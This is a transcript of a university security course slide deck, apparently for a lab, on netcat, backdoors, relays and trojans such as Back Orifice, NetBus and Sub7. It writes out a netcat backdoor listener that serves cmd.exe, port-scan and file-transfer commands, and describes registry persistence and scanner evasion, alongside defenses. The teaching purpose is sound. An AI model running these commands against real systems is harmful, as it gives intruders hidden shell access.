Presentation is loading. Please wait.

Presentation is loading. Please wait.

Backdoors and Trojans.

Published byMary Hopkins Modified over 6 years ago

Similar presentations

Presentation on theme: "Backdoors and Trojans."— Presentation transcript:

1 Backdoors and Trojans

2 ECE 4112 - Internetwork Security
Agenda Overview Netcat Trojans/Backdoors ECE Internetwork Security

3 ECE 4112 - Internetwork Security
Agenda Netcat Netcat Overview Major Features Installation and Configuration Possible Uses Netcat Defenses Summary ECE Internetwork Security

4 Netcat – TCP/IP Swiss Army Knife
Reads and Writes data across the network using TCP/UDP connections Feature-rich network debugging and exploration tool Part of the Red Hat Power Tools collection and comes standard on SuSE Linux, Debian Linux, NetBSD and OpenBSD distributions. UNIX and Windows versions available at: ECE Internetwork Security

5 ECE 4112 - Internetwork Security
Netcat Designed to be a reliable “back-end” tool – to be used directly or easily driven by other programs/scripts Very powerful in combination with scripting languages (eg. Perl) “If you were on a desert island, Netcat would be your tool of choice!” - Ed Skoudis ECE Internetwork Security

6 Netcat – Major Features
Outbound or inbound connections TCP or UDP, to or from any ports Full DNS forward/reverse checking, with appropriate warnings Ability to use any local source port Ability to use any locally-configured network source address Built-in port-scanning capabilities, with randomizer ECE Internetwork Security

7 Netcat – Major Features (contd)
Built-in loose source-routing capability Can read command line arguments from standard input Slow-send mode, one line every N seconds Hex dump of transmitted and received data Optional ability to let another program service established connections Optional telnet-options responder ECE Internetwork Security

8 ECE 4112 - Internetwork Security
Netcat (called ‘nc’) Can run in client/server mode Default mode – client Same executable for both modes client mode nc [dest] [port_no_to_connect_to] listen mode (-l option) nc –l –p [port_no_to_connect_to] ECE Internetwork Security

9 ECE 4112 - Internetwork Security
Netcat – Client mode Computer with netcat in Client mode Input comes from a standard Input device Passes through netcat in client mode Output is sent across the network to any TCP/UDP port on any system ECE Internetwork Security

10 ECE 4112 - Internetwork Security
Netcat - listen mode Computer with netcat in listen mode Input comes from the network on any TCP/UDP port Passes through netcat in listen mode Output appears on standard output device ECE Internetwork Security

11 Netcat - Configuration
LINUX installation tar xvfs netcat.tar.gz cd netcat make linux cp nc /usr/local/sbin Note: The last command will allow you to run netcat without having to specify the directory ECE Internetwork Security

12 ECE 4112 - Internetwork Security
Netcat - Installation Windows Installation Copy file nc11nt.zip in a folder Unzip this file – creates a directory called nc11nt To run netcat – go to the nc11nt folder and run it from there ECE Internetwork Security

13 ECE 4112 - Internetwork Security
Netcat – Possible uses Transfer files Scan ports Create backdoors Create relays Many more… ECE Internetwork Security

14 ECE 4112 - Internetwork Security
Netcat – File transfer Scenario: Attacker wants to transfer a file to another machine, only one port open and that is not FTP port Windows – nc listener (IP: a.b.c.d) c:\ nc –l –p 1234 > testfile.txt Linux – nc client (IP: a.b.c.d) nc a.b.c.d 1234 < testfile.txt Here, the attacker is using port number 1234 for the file transfer. ECE Internetwork Security

15 ECE 4112 - Internetwork Security
Netcat – Scan ports Goal: To scan ports without using nmap Send H-E-L-L-O to each target On the client machine echo Hello | nc –v –w 3 –z a.b.c.d 1-200 This will go to various TCP or UDP ports on the target machine ECE Internetwork Security

16 Netcat – Create backdoors
On Windows machine, create netcat backdoor listener that runs cmd.exe shell c:\ nc –l –p 7777 –e cmd.exe Connect to this backdoor by running netcat in client mode on Linux machine nc a.b.c.d 7777 Can send commands like “cd” and “mkdir” On your Windows machine, create a Netcat backdoor listener that runs the cmd.exe shell. Select any port number you’d like for the listener. Connect to this backdoor by running Netcat in client mode on your Linux machine. Now run some simple commands such as “dir” and “mkdir”. Now try running some complex commands and examine the extent of information that you can learn about the system in this manner. ECE Internetwork Security

17 ECE 4112 - Internetwork Security
Netcat – Create relays Can be used to bounce connections between systems. Obscures attacker’s source Create a relay on the Linux machine Configure the relay to forward data to another port on the linux machine At the other port, set up a netcat backdoor shell Connect to the relay from the Windows machine using netcat in client mode Using a Netcat listener and client, create a relay on your Linux machine. Configure the relay to forward any received information to another port on your Linux machine. At that other port, set up a Netcat backdoor shell. Connect to your relay from your Windows machine using Netcat in client mode. For this exercise, you’ll use Netcat the following four times: As a listener in the relay on your Linux machine As a client in the relay on your Linux machine As a listener, ready to run a shell on the Linux machine As a client on your Windows machine, where commands can be typed to be sent to the relay. ECE Internetwork Security

18 ECE 4112 - Internetwork Security
Netcat Defenses For file transfer and port scanning – Close all unused ports For backdoors Close unused ports Carefully audit system usage Check applications running with root privileges Close suspicious programs For relays – Multiple layers of security ECE Internetwork Security

19 ECE 4112 - Internetwork Security
Summary Netcat Netcat Overview Major Features Installation and Configuration Possible Uses Netcat Defenses Next – Trojans/Backdoors ECE Internetwork Security

20 Agenda Trojans/Backdoors
Malicious Remote Access Tools Backdoors Trojans Defenses against Trojans/Backdoors Virtual Network Channels Summary ECE Internetwork Security

21 Malicious Remote Access Tools
Backdoors Also called as “trapdoor” An undocumented way of gaining access to a program, online service or an entire computer system. Allows to execute privileged operations on the affected machine Trojan Horse Does not replicate or copy itself Damages or compromises the security of the computer It relies on someone ing it to you. It does not itself Basically BO is a remote administration tool but it can be used for malicious purposes as well. Bear in mind that when you are keeping such a remote access server running on your computer you are always running a risk of an attack, because the remote attacker can exploits vulnerabilities in that software to gain access of your computer. But you can achieve some level of security with this RAS server running too by having a personal firewall running on your system which blocks tcp connects to all but one host…but then again IP spoofing has been around for quite some while too…if anything is there on the network you cannot bring the risk of attacks to zero…but only minimize it using tools but at the same time get some flexibility for your own purposes. ECE Internetwork Security

22 ECE 4112 - Internetwork Security
Back Orifice Authored by Cult of the Dead Cow Released on 3rd Aug 1998 Allows remote manipulation of File system Registry System Passwords Network Processes ECE Internetwork Security

23 ECE 4112 - Internetwork Security
Back Orifice (cont.) First widely used trojan Complete Implementation of services supported by the Windows 95/98 API Small, freely available Attached to innocent binary Detection Encrypted UDP (port 31337) XOR packets with random stream + password Optional TCP file transfer ECE Internetwork Security

24 ECE 4112 - Internetwork Security
NetBus Officially distributed by SpectorSoft ( eBlaster Records information and s it All websites visited, applications run, keystrokes typed, chat conversations, instant messages Spector Like a “camera” Records everything being done on the computer, takes several screen shots which can be played back as a movie ECE Internetwork Security

25 ECE 4112 - Internetwork Security
NetBus The author of NetBus says, "NetBus was made to let people have some fun with his/her friends." He also says, "I hope NetBus (and similar programs like Back Orifice) will make more people aware of the security risks at their system." Unfortunately, NetBus allows far more access than a mere prank should ever require ECE Internetwork Security

26 ECE 4112 - Internetwork Security
NetBus It allows anyone running the client portion to connect and control anyone running the server portion of it, with the same rights and privileges as the currently logged on user. ECE Internetwork Security

27 ECE 4112 - Internetwork Security
NetBus Features Does everything Back Orifice can do & more Tricks with the CD (open, close on command or timed intervals Mouse control (can swap functions of the left and right buttons) Send Interactive dialogues to communicate with the compromised machine ECE Internetwork Security

28 ECE 4112 - Internetwork Security
Sub7 One of the most popular and powerful trojan horses around Originally known as Backdoor G Has been revised many times in the past Known for its ease of use and flexible settings ECE Internetwork Security

29 ECE 4112 - Internetwork Security
Sub7 A partial list of what Sub7 can do Monitor all online activity Manipulate any file on the machine Edit the registry Host FTP servers Record passwords and keystrokes Watch you (if you have a webcam) and much more… ECE Internetwork Security

30 ECE 4112 - Internetwork Security
Sub7 Used to escape virus detection, since it morphs itself, every time it is sent to a new victim How it loads, where it hides It can hide in any directory and can load from the registry and a few other less known places It can be assigned a different file name each time it runs, so every time the machine is rebooted, the file is altered in some way Harder to track down and delete ECE Internetwork Security

31 ECE 4112 - Internetwork Security
Sub7 It usually hides in the following location HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\ CurrenVersion\Run or CurrentVersion\RunServices HKEY_CLASSES_ROOT\*\shellex ECE Internetwork Security

32 ECE 4112 - Internetwork Security
Sub7 If it is placed in the shellex part of the registry, even if the infected file is removed, the computer will not function properly For e.g. c:\windows\sub7.exe /notepad.exe Removing sub7.exe will stop normal execution of notepad.exe also ECE Internetwork Security

33 ECE 4112 - Internetwork Security
Sub7 Screenshot #1 Sub7 Main Window. Shown here are the different server settings. ECE Internetwork Security

34 ECE 4112 - Internetwork Security
Sub7 Screenshot #2 Sub7 Screen Capture. ECE Internetwork Security

35 ECE 4112 - Internetwork Security
Sub7 Screenshot #3 Sub7 File Manager. ECE Internetwork Security

36 ECE 4112 - Internetwork Security
Sub7 Screenshot #4 Sub7 Server Editor Program. Allows you to customize your server so virus scanners and Intruder detection systems can't find it. Controlling the cloaking and other options of the Sub7 Server ECE Internetwork Security

37 How attackers find an infected PC
Some trojans report the IP address on an IRC channel Port scanners Used to find PCs which has “the backdoor open” Customized access – Password protected Infected machine can then be accessed only by the person who has the password ECE Internetwork Security

38 Defense against Trojans/Backdoors
Scan attachments properly (most common way of infecting machines) Anti-virus checks Firewalls Remove suspicious programs/processes ECE Internetwork Security

39 Virtual Network Connections
Application level backdoor Can control for example a Windows machine from a Linux machine using VNC Install VNC Run the VNC server on the Windows machine Use Linux VNC viewer to access the server on Windows machine ECE Internetwork Security

40 Virtual Network Connections
Controlling a Linux machine from Windows Run VNC server on Linux Use VNC viewer from Windows to access the Linux machine Note: Reconfigure the firewall on a linux machine to accept packets for the VNC port (TCP port 5901) Hint: On Linux, you will see another virtual desktop, not the normal user’s desktop and mouse movements. Still, even though you cannot see what the normal user is doing, you have remote control of the Linux system from Windows. ECE Internetwork Security

41 ECE 4112 - Internetwork Security
Summary Trojans Backdoors Defenses against Trojans/Backdoors Virtual Network Connections ECE Internetwork Security

Download ppt "Backdoors and Trojans."

Similar presentations

Cybersecurity Training in a Virtual Environment By Chinedum Irrechukwu.

Cybersecurity Training in a Virtual Environment By Chinedum Irrechukwu.
FIREWALLS. What is a Firewall? A firewall is hardware or software (or a combination of hardware and software) that monitors the transmission of packets.

FIREWALLS. What is a Firewall? A firewall is hardware or software (or a combination of hardware and software) that monitors the transmission of packets.
FIREWALLS The function of a strong position is to make the forces holding it practically unassailable —On War, Carl Von Clausewitz On the day that you.

FIREWALLS The function of a strong position is to make the forces holding it practically unassailable —On War, Carl Von Clausewitz On the day that you.
1 Linux Networking and Security Chapter 2. 2 Configuring Basic Networking Describe how networking devices differ from other Linux devices Configure Linux.

1 Linux Networking and Security Chapter 2. 2 Configuring Basic Networking Describe how networking devices differ from other Linux devices Configure Linux.
Hacker, Cracker?! Are they the same? No!!! Hacker programmers intensely interested in the arcane and recondite workings of any computer operating system.

Hacker, Cracker?! Are they the same? No!!! Hacker programmers intensely interested in the arcane and recondite workings of any computer operating system.
Trojan Horse Program Presented by : Lori Agrawal.

Trojan Horse Program Presented by : Lori Agrawal.
Building Your Own Firewall Chapter 10. Learning Objectives List and define the two categories of firewalls Explain why desktop firewalls are used Explain.

Building Your Own Firewall Chapter 10. Learning Objectives List and define the two categories of firewalls Explain why desktop firewalls are used Explain.
Intruder Trends Tom Longstaff CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh, PA 15213-3890 Sponsored by.

Intruder Trends Tom Longstaff CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh, PA Sponsored by.
Telnet/SSH Tim Jansen, Mike Stanislawski. TELNET is short for Terminal Network Enables the establishment of a connection to a remote system, so that the.

Telnet/SSH Tim Jansen, Mike Stanislawski. TELNET is short for Terminal Network Enables the establishment of a connection to a remote system, so that the.
Port Scanning Yiqian Zhang CS 265 Project. What is Port Scanning? port scanning is equivalent to knocking on the walls to find all the doors and windows.

Port Scanning Yiqian Zhang CS 265 Project. What is Port Scanning? port scanning is equivalent to knocking on the walls to find all the doors and windows.
How Clients and Servers Work Together. Objectives Learn about the interaction of clients and servers Explore the features and functions of Web servers.

How Clients and Servers Work Together. Objectives Learn about the interaction of clients and servers Explore the features and functions of Web servers.
Guide to Operating System Security Chapter 2 Viruses, Worms, and Malicious Software.

Guide to Operating System Security Chapter 2 Viruses, Worms, and Malicious Software.
Internet Relay Chat Security Issues By Kelvin Lau and Ming Li.

Internet Relay Chat Security Issues By Kelvin Lau and Ming Li.
Internet Relay Chat Chandrea Dungy Derek Garrett #29.

Internet Relay Chat Chandrea Dungy Derek Garrett #29.
2440: 141 Web Site Administration Remote Web Server Access Tools Instructor: Enoch E. Damson.

2440: 141 Web Site Administration Remote Web Server Access Tools Instructor: Enoch E. Damson.
Trojan Horse Implementation and Prevention By Pallavi Dharmadhikari Sirisha Bollineni VijayaLakshmi Jothiram Vasanthi Madala.

Trojan Horse Implementation and Prevention By Pallavi Dharmadhikari Sirisha Bollineni VijayaLakshmi Jothiram Vasanthi Madala.
Port Knocking Software Project Presentation Paper Study – Part 1 Group member: Liew Jiun Hau (20086034) Lee Shirly (20095815) Ong Ivy (20095040)

Port Knocking Software Project Presentation Paper Study – Part 1 Group member: Liew Jiun Hau ( ) Lee Shirly ( ) Ong Ivy ( )
1 Backdoors and Trojans. ECE 4112 - Internetwork Security 2 Agenda Overview Netcat Trojans/Backdoors.

1 Backdoors and Trojans. ECE Internetwork Security 2 Agenda Overview Netcat Trojans/Backdoors.
© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public 1 Version 4.1 ISP Responsibility Working at a Small-to-Medium Business or ISP – Chapter 8.

© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public 1 Version 4.1 ISP Responsibility Working at a Small-to-Medium Business or ISP – Chapter 8.
1 Chap 10 Malicious Software. 2 Viruses and ”Malicious Programs ” Computer “Viruses” and related programs have the ability to replicate themselves on.

1 Chap 10 Malicious Software. 2 Viruses and ”Malicious Programs ” Computer “Viruses” and related programs have the ability to replicate themselves on.

Similar presentations

Ads by Google